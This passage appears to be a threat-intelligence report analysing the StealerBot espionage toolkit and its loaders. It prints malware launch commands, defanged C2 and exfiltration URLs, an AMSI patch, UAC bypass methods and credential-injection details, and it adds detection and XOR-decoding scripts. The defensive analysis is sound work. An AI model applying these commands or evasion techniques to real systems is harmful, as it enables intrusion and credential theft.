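            + _string_data("MOAVINEEN-E-HUJJAJ HAJJ-2024.docx")
            + _string_data("..\\..\\..\\Windows\\System32\\calca.exe")
            + _string_data("C:\\Windows\\System32")
            + _string_data('"https://C2-PLACEHOLDER.invalid/8eee4f/mora/hta?q=0"')
            + _string_data("%systemroot%\\System32\\moricons.dll"))
```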

Downloader module


The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.

JavaScript loader (beautified)

App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.

The library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We named the inputs as follows:

| Argument | Argument description |
|---|---|
| C2_URL | An optional argument that can be used to pass a URL used to download a remote payload. |
| Payload_filename | An optional argument that can be used together with the “Payload_Data” argument to create a file on the local filesystem that will contain the dropped payload. |
| Payload_data | An optional argument that can be used to pass an encoded payload that should be dropped on the local filesystem. |

App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it decodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory using the filename specified in the “Payload_filename” argument.

If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:
mshta.exe "javascript:WshShell = new ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1, false);window.close()
Otherwise, it will be executed with the following command:
pcalua.exe -a %TEMP%\%Payload_filename%
If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.

The resulting file should be .NET malware named “ModuleInstaller.dll”.

ModuleInstaller


The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.

ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most common being:
%Malware Directory%\vssvc.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\vsstrace.dll
%Malware Directory%\vssvc.exe.config
or
%Malware Directory%\WorkFolders.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\propsys.dll
%Malware Directory%\WorkFolders.exe.config
ModuleInstaller embeds the following resources:

| Resource name | MD5 | Description |
|---|---|---|
| Interop_TaskScheduler_x64 | 95a49406abce52a25f0761f92166c18a | Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks |
| Interop_TaskScheduler_x86 | dfe750747517747afa2cee76f2a0f8e4 | Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks |
| manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest dropped as .config file |
| PeLauncher | 22e3a5970ae84c5f68b98f3b19dd980b | .NET program not used in the code |
| shellcode | 32fc462f80b44013caeada725db5a2d1 | Shellcode used to load libraries, which exports a function named “Start” |
| StealerBot_CppInstaller | a107f27e7e9bac7c38e7778d661b78ac | C++ library used to download two malicious libraries and create persistence points |

The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:

| Pattern | Endpoint Security Solution |
|---|---|
| q=apn | Unknown |
| aspers | Kaspersky |
| Afree | McAfee (misspelled) |
| avast | Avast |
| avg | AVG |
| orton | Norton |
| 360 | 360 Total Security |
| avir | Avira |

ModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an argument and the value of an internal configuration embedded in the code.

| Routine | Conditions |
|---|---|
| Infection Routine 1 | Executed when substring “q=apn” is detected. |
| Infection Routine 2 | Executed when a specific byte of the internal config is equal to “1”. |
| Infection Routine 3 | Executed when the substring “360” is detected. |
| Infection Routine 4 | Executed when the substring “avast” or “avir” is detected. |
| Infection Routine 5 | Executed when the substring “aspers” or “Afree” is detected. |
| Infection Routine 6 | Default case. Executed when all the other conditions are not satisfied. |

All the routines collect information about the compromised system. Specifically, they collect:

  • Current username;
  • Processor names and number of cores;
  • Physical disk name and size;
  • The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;
  • Current hostname;
  • Local IP address;
  • Installed OS;
  • Architecture.

The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named “data”.
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo>
The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:
C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download
C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download
C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download
C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download
The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.

The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the full list of possible configuration values.

| Variable name | Description |
|---|---|
| MALWARE_DIRECTORY | Directory path where all the malicious files are stored. |
| LOAD_DLL_URL_X64 | URL used to download the malicious library for 64-bit systems. |
| LOAD_DLL_URL_X86 | URL used to download the malicious library for 32-bit systems. |
| LOAD_DLL_URL | URL used to download the malicious library. Some infection routines do not check the architecture. |
| APP_DLL_URL | URL used to download the encrypted payload. |
| HIJACK_EXE_URL | URL used to download the legitimate application used to sideload the malicious library. |
| RUN_KEY | Name of the Windows Registry value that will be created to maintain persistence. |
| HIJACK_EXE_NAME | Name of the legitimate application. |
| LOAD_DLL_NAME | Name of the malicious library. |
| MOD_LOAD_DLL_URL | URL used to download an unknown library that is saved in the MALWARE_DIRECTORY as “IPHelper.dll”. |

The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.

During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the infection status.

| Variable | Description |
|---|---|
| ?data=1 | Downloads completed. |
| ?data=2 | Persistence point created. |
| ?data=3&m=str | Error. It also contains a variable “m” with information about the error. |
| ?data=4 | Infection completed, but the next stage is not running. |
| ?data=5 | Infection completed and the next stage is running. |

The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.

For example:
RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegValue: xcschemer (MALWARE_DIRECTORY)
RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)
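Detection logic for the execution and persistence artefacts described in the App.dll and ModuleInstaller sections (mshta launching a %TEMP% file from a javascript: stub, pcalua.exe -a proxy execution, a signed sideload host such as vssvc.exe or WorkFolders.exe started from a user-writable directory, and an HKCU Run value pointing at such a host). Added example, not the report's own tooling; the events are constructed and the Sysmon-like field names (Image, CommandLine, TargetObject, Details) are an assumption about the telemetry schema.

```python
import re

# Signed hosts the report saw copied next to a malicious DLL for sideloading
SIDELOAD_HOSTS = {"vssvc.exe", "workfolders.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process_event(ev: dict) -> list:
    """Names of the App.dll / ModuleInstaller execution patterns a process
    creation event matches (empty list means nothing interesting)."""
    hits = []
    full = ev.get("Image", "").lower()
    image = _basename(full)
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    # App.dll on hosts with Avast/AVG: mshta runs a javascript: stub that launches a %TEMP% file
    if image == "mshta.exe" and "javascript:" in low and "\\temp\\" in low:
        hits.append("mshta_javascript_temp_launch")
    # App.dll elsewhere: pcalua.exe -a <dropped payload> (proxy execution)
    if image == "pcalua.exe" and re.search(r"\s-a\s+\S", cmd):
        hits.append("pcalua_proxy_execution")
    # ModuleInstaller: signed sideload host started from outside the system directories
    if image in SIDELOAD_HOSTS and not full.startswith(SYSTEM_DIRS):
        hits.append("sideload_host_outside_system32")
    return hits


def classify_registry_event(ev: dict) -> list:
    """HKCU Run value whose data points a sideload host into a user-writable directory."""
    key = ev.get("TargetObject", "").lower()
    data = ev.get("Details", "").lower().strip('"')
    if RUN_KEY not in key:
        return []
    if _basename(data) in SIDELOAD_HOSTS and any(d in data for d in USER_WRITABLE):
        return ["run_key_to_sideload_host"]
    return []


def scan(events: list) -> dict:
    """Map event index -> list of matched pattern names; unmatched events are omitted."""
    report = {}
    for i, ev in enumerate(events):
        kind = ev.get("EventType", "")
        hits = classify_registry_event(ev) if kind.startswith("Registry") else classify_process_event(ev)
        if hits:
            report[i] = hits
    return report


# Constructed events (not real telemetry); paths mirror the report's examples
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "javascript:WshShell = new ActiveXObject(\"WScript.Shell\");'
                    r'WshShell.Run(\"C:\Users\u\AppData\Local\Temp\upd.exe\", 1, false);window.close()"'},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"pcalua.exe -a C:\Users\u\AppData\Local\Temp\upd.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Users\u\AppData\Roaming\xcschemer\vssvc.exe",
     "CommandLine": "vssvc.exe"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\vssvc.exe",  # legitimate VSS service
     "CommandLine": "vssvc.exe"},
    {"EventType": "RegistryValueSet",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xcschemer",
     "Details": r"C:\Users\u\AppData\Roaming\xcschemer\vssvc.exe"},
]
```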

Backdoor loader module


The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded using the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.

The Backdoor loader module has been observed since 2020 and we covered it in our private APT reports. It has remained almost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, whereas the latest variants were designed to enumerate all the files in the current directory and load those without an extension.

The library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names, and resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.

The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in execution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the elapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.

The malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the “AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.

AmsiScanBuffer before patching

AmsiScanBuffer after patching

The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.

After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character ‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method.
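A decoder for the two payload-wrapping schemes this report describes: the ModuleInstaller download, XORed twice with a 32-byte key taken from the front of the data, and the Backdoor loader's extensionless file, whose first 16 bytes are the key for the rest. Added example, not code from the report or the malware; the layout "key prefix followed by the XORed body" and the second key being read from the front of the first-layer output are our reading of the text, and the PE stand-in is constructed.

```python
def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def peel_prefix_key(blob: bytes, key_len: int) -> bytes:
    """One layer: the first key_len bytes are the key, the remainder is the ciphertext."""
    if len(blob) <= key_len:
        raise ValueError("blob shorter than its %d-byte key prefix" % key_len)
    return xor_with_key(blob[key_len:], blob[:key_len])


def decode_module_installer_payload(blob: bytes) -> bytes:
    """ModuleInstaller download: two layers with a 32-byte key each; the second
    key is read from the front of the first-layer output (assumed layout)."""
    return peel_prefix_key(peel_prefix_key(blob, 32), 32)


def decode_backdoor_loader_file(blob: bytes) -> bytes:
    """Backdoor loader's extensionless file: one layer with a 16-byte key."""
    return peel_prefix_key(blob, 16)


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on a decoded stage: MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def wrap_prefix_key(payload: bytes, key: bytes) -> bytes:
    """Inverse of peel_prefix_key; only used here to build constructed test material."""
    return key + xor_with_key(payload, key)


def build_fake_pe() -> bytes:
    """Constructed stand-in for a .NET assembly: DOS header whose e_lfanew points at PE\\0\\0."""
    dos = bytes(b"MZ" + bytes(0x3A)) + (0x80).to_bytes(4, "little")  # e_lfanew at offset 0x3C
    return dos + bytes(0x80 - len(dos)) + b"PE\0\0" + b"\x4c\x01" + bytes(40)


def demo() -> bool:
    """Round-trip both schemes over the constructed PE and confirm the wrapped form is opaque."""
    pe = build_fake_pe()
    two_layer = wrap_prefix_key(wrap_prefix_key(pe, bytes(range(100, 132))), bytes(range(32)))
    one_layer = wrap_prefix_key(pe, b"0123456789abcdef")
    return (decode_module_installer_payload(two_layer) == pe
            and looks_like_pe(decode_backdoor_loader_file(one_layer))
            and not looks_like_pe(two_layer))
```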

StealerBot


StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. Prior to being loaded, the binary is stored in an encrypted file.

The implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded on compromised victims and were used to:

  • Install additional malware;
  • Capture screenshots;
  • Log keystrokes;
  • Steal passwords from browsers;
  • Intercept RDP credentials;
  • Steal files;
  • Start reverse shell;
  • Phish Windows credentials;
  • Escalate privileges bypassing UAC.

Module IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the components. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.

| Module ID | Description |
|---|---|
| 0xca | Keylogger |
| 0xcb | Live Console |
| 0xd0 | Screenshot Grabber |
| 0xd4 | File Stealer |
| 0xd6 | UACBypass |
| 0xe0 | RDP Credential Stealer |
| 0xe1 | Token Grabber |
| ?? | Credential Phisher |

StealerBot Orchestrator


The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.

Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource contains a configuration file with the following structure:

| Parameter | Parameter type | Description |
|---|---|---|
| Config path | String | Location used to store the configuration file after first execution |
| Data directory | String | Directory where the plugins store the output files that will be uploaded to the remote C2 |
| C2 Modules | String | URL used to communicate with C2 server and retrieve additional plugins |
| C2 Gateway | String | URL used to upload files generated by modules |
| C2 Modules Sleeptime | Integer | Sleep time between communications with “C2 Modules” |
| C2 Gateway Sleeptime | Integer | Sleep time between communications with “C2 Gateway” |
| RSA_Key | String | RSA key used to encrypt communication with the C2 server |
| Number of plugins | Integer | Number of plugins embedded in the configuration |
| Modules | Array | Array which contains the modules |

The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.

After parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2 Modules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2 Gateway”, which is used to upload the data generated by the modules.

The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x” value that contains the list of modules already loaded by the agent.
&x[moduleId_1,moduleId_2,moduleId_3,etc.]"
The server responds with a message composed of two parts, the header and the payload. Each part has a specific structure with different information:

Message structure

Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the provided digital signature is valid.

The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.

When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.

The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. The messages function like commands, have a specific ID, and can include arguments.

The first byte of the message is its ID, which defines the request type:

| Message ID | Description |
|---|---|
| 0 | Get settings: the Orchestrator creates a copy of the current configuration and sends it to the module. |
| 1 | Update config: the module provides a new configuration and the Orchestrator updates the current configuration values and stores them in the local file. |
| 2 | Unload current module: the Orchestrator should unload the current module from the memory and close the related pipes. |
| 3 | Unload module by ID: the Orchestrator should unload a module with the ID specified in the received request. |
| 4 | Remove startup: the Orchestrator should remove a module from the local configuration. The module ID is specified in the received request. |
| 5 | Remove current module from the configuration: the Orchestrator should remove the current module ID from the local configuration. |
| 6 | Terminate current thread: the Orchestrator stops timers, pipes and removes the current module from the current list of modules. |
| 7 | Save log message: the Orchestrator saves a log message using the current module ID. |
| 8 | Save log message: the Orchestrator saves a log message using the specified module ID. |
| 9 | Get output folder configuration. |
| 10 | Get C2 Modules URL: the Orchestrator shares the current C2 Modules URL with the module. |
| 11 | Get C2 Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module. |
| 12 | Get RSA_Key public key. |

Modules

Keylogger


This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.

Screenshot Grabber


This module periodically grabs screenshots of the primary screen.

File Stealer


The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. By default, the list of extensions is as follows:
.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems.

The stolen data also includes information about the local drive and file attributes.

Snippet of code with the list of information collected by the File Stealer module

Live Console


This library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also process custom commands that provide the following capabilities:

  • Kill the module itself or its child processes;
  • Download additional files to compromised systems;
  • Add Windows Defender exclusions;
  • Infect other users on the local system (requires high privileges);
  • Download and execute remote HTML applications;
  • Load arbitrary modules and extend malware capabilities.

Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code. By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.

If the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a pseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in “System.Diagnostics”.

Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.

| Windows build | Command ID | Description |
|---|---|---|
| < 17763 | 3 | Kill all child processes |
| < 17763 | 4 | Kill the current module. Sends the message ID “2” to the Orchestrator to unload the module itself. |
| < 17763 | 16 | Upload file to the infected system |
| >= 17763 | 1 | Infect current logged-in user |
| >= 17763 | 2 | Get current logged-in user |
| >= 17763 | 3 | Download and execute a remote HTML application |
| >= 17763 | 4 | Add directories to AV exclusions |
| >= 17763 | 5 | Load a plugin |

Most of the commands are self-explanatory. We’d like to add a few words on the command with ID “1”, which is used to infect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the samples in the target user’s directory and creates a new registry value to ensure persistence.

This command is interesting because in the case of a specific error, the bot replies with the following message:
Infected User is already logged in, use install dynx command from stealer bot for installation
Currently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of the resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this malware StealerBot.

RDP Credential Stealer


This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into “mstsc.exe” to steal RDP credentials.

mstsc.exe GUI

Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the malware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new process memory.

The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the Windows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:

  • SspiPrepareForCredRead;
  • CryptProtectMemory;
  • CredIsMarshaledCredentialW.

The three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.

Token Grabber


The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.

| Library | Hash | Description |
|---|---|---|
| Newtonsoft.Json | 52a7a3100310400e4655fb6cf204f024 | A popular high-performance JSON framework for .NET |
| System.Data.SQLite | fcb2bc2caf7456cd9c2ffab633c1aa0b | An ADO.NET provider for SQLite |
| SQLite_Interop_x64.dll | 1b0114d4720af20f225e2fbd653cd296 | A library for 64-bit architectures required by System.Data.SQLite to work properly |
| SQLite_Interop_x86.dll | f72f57aa894f7efbef7574a9e853406d | A library for 32-bit architectures required by System.Data.SQLite to work properly |

Credential Phisher


This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.

Phishing prompt

Similar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current users and trick victims into entering their Windows credentials.

When the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.

UACBypass


This module is a .NET library designed to bypass UAC and run malicious code with high privileges.

The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.

| Resource | Hash | Description |
|---|---|---|
| COMUacBypass | 7f357621ba88a2a52b8146492364b6e0 | Library used to bypass UAC abusing IElevatedFactoryServer COM object |
| manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest |
| Module | b0f0c29f4143605d5f958eba664cc295 | Malicious library used to download additional malware |
| ReflectiveDllLoader | f492b2d5431985078b85c78661e20c09 | Shellcode to run libraries in memory |
| VmComputeAgent | ba2914b59c7ae08c346fc5a984dcc219 | Program used for Slui UAC bypass technique |
| VmComputeAgent_exe | d3136d7151f60ec41a370f4743c2983b | XML manifest |

Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.

Windows Server or Windows NT 6:

| Path | Content |
|---|---|
| %Temp%\%TempFile% | Copy of resource named “Module” |
| %localappdata%\Microsoft\rundll32.exe | Copy of the legitimate program “%systemroot%\System32\rundll32.exe” |
| %localappdata%\Microsoft\rundll32.exe.config | Copy of resource named “manifest” |

Other Windows versions:

| Path | Content |
|---|---|
| %localappdata%\Microsoft\devobj.dll | Copy of resource named “Module” |
| %localappdata%\Microsoft\rdpclip.exe | Copy of the legitimate program “%systemroot%\System32\rdpclip.exe” |

The main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.

If one of these security solutions is detected, the malware instead uses a more recent UAC bypass technique, disclosed in 2022, which abuses the "IElevatedFactoryServer" COM object.

In that case, the malware injects shellcode into "explorer.exe". The shellcode loads and executes the malicious library stored in the resource named "COMUacBypass". The library uses the "IElevatedFactoryServer" COM object to register a new scheduled task that runs with the highest privileges, and that task runs the dropped payload with elevated privileges.

During the static analysis of the "UACBypass" module we noticed code that is never called. Specifically, a method named "KasperskyUACBypass" implements a third bypass technique, probably used in the past when the system was protected by Kaspersky anti-malware software. It abuses the legitimate Windows program slui.exe, which is used to activate and register the operating system with a valid product key but is prone to a file handler hijacking weakness: because slui.exe auto-elevates, an attacker who redirects the handler it invokes through per-user registry keys gets that program executed with high privileges. The hijacking technique was described in 2020 and is based on the modification of specific Windows registry keys. Based on the values created, we believe the attacker based their code on a proof of concept available on GitHub.

The module still includes two resources that are used exclusively by this code:

  • VmComputeAgent: a very simple program, packed with ConfuserEx, which starts a new process, "%systemroot%\System32\slui.exe", as administrator.
  • VmComputeAgent_exe: an XML manifest.

Downloader


The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr
Unfortunately, we were not able to get a valid response from the server, but considering the "name" variable in each URL and the logic of the components observed during the investigation, we infer that each "name" value indicates the purpose of the requested file.

Variable | Description
?name=inpl64 | implant for 64-bit architectures
?name=stg64 | stager for 64-bit architectures
?name=rflr | probably a reflective loader

The downloaded data are combined into a final payload with the following structure:
stg64 + <size of rflr+inpl64+8> + rflr + <delimiter> + inpl64
Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.

On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.

On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.

The malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied in the allocated region.

Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.

Snippet of reversed code used to hook LoadLibrary and run the payload

The small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.

Shellcode embedded in the downloader image

Installers


During the investigation we found two more components, which are installers used to deploy StealerBot on the systems. We did not observe them during the infection chain; they are probably used to install new versions of the malware or to deploy it in a different context on the same machine, for example to infect another user.

InstallerPayload


The first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.

The injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.

The malware is configured to download the files from a predefined URL using WinHTTP.
hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869EF0mo673/1/1706084656128/x3l8o/2c821e
The specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:

Variable | Destination file path
?name=bp | %systemroot%\srclinks\%RANDOM_NAME% (example name: VacPWtys)
?name=ps | %systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe
?name=dj | %systemroot%\srclinks\devobj.dll or %systemroot%\srclinks\propsys.dll
?name=v3d | %systemroot%\srclinks\vm3dservice.exe
?name=svh | %systemroot%\srclinks\winmm.dll
?name=fsq | %systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe

The specific filename changes according to the Windows version.

